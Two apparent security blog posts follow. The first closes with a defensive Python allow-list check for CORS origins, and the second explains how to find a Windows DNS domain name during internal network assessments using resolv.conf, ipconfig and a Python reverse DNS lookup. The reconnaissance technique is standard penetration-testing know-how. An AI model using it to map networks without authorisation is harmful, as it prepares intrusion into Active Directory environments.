JSONP should no longer be used, as HTML5 features like CORS and postMessage are available with well defined security mechanisms; however, these also require careful validation of the "origin" to prevent the data being passed to unauthorised domains.
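
Whichever mechanism is used, the validation itself should be an exact match against an allow list, never a regular expression or substring check. A minimal sketch in Python (the origin values are illustrative):

# Exact-match allow list of trusted origins, scheme included.
ALLOWED_ORIGINS = {"https://www.somedomain.co.uk"}

def cors_headers(request_origin):
    # Return CORS headers only when the Origin header is explicitly trusted.
    if request_origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": request_origin, "Vary": "Origin"}
    return {}

print(cors_headers("https://www.somedomain.co.uk"))   # allowed
print(cors_headers("https://wwwXsomedomainXco.uk"))   # rejected: {}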


As always, if you have any comments or suggestions please feel free to get in touch.

How to find the Windows DNS style Domain Name

A common requirement on internal network assessments is to know the fully qualified Windows domain name of the network. This is trivial to obtain if using DHCP.

On Linux-like systems simply:

cat /etc/resolv.conf

The domain name is in the ‘domain’ or ‘search’ field.

On Windows you can see the domain name in the Network Settings accessible from the system tray, or in the 'DNS suffix' section of the output of:

ipconfig

However, if for whatever reason you are not using DHCP, these methods are less likely to work. It is still possible to get the domain name by querying a host on the network. My preferred method of doing this is, of course, Python:

import socket
socket.gethostbyaddr("ip_addr")

Where ip_addr is any live host on the network; the DNS server that I set as part of the static configuration is what I usually use. This function returns the fully qualified domain name, a list of aliases (commonly the NetBIOS name), and the IP address of the remote host. Everything after the first '.' in the FQDN is the DNS style Windows Domain Name. E.g. if the FQDN of the host is:

dnsserv1.corp.ad.company.com

the domain name would be:

corp.ad.company.com
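
Putting that together, a short snippet (the IP address below is just a placeholder for any live host, such as the statically configured DNS server):

import socket

# Reverse-resolve the host and strip the first label to leave the
# DNS style Windows Domain Name.
fqdn, aliases, addresses = socket.gethostbyaddr("10.0.0.1")
domain = fqdn.split(".", 1)[1] if "." in fqdn else fqdn
print(domain)  # e.g. corp.ad.company.com for dnsserv1.corp.ad.company.com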

There are other methods that may be used to identify the legacy, but ubiquitous, NetBIOS style Windows Domain Name, which I will save for a future post.

This information can then be used to identify the Windows Domain Controllers, which I will also describe in a later post.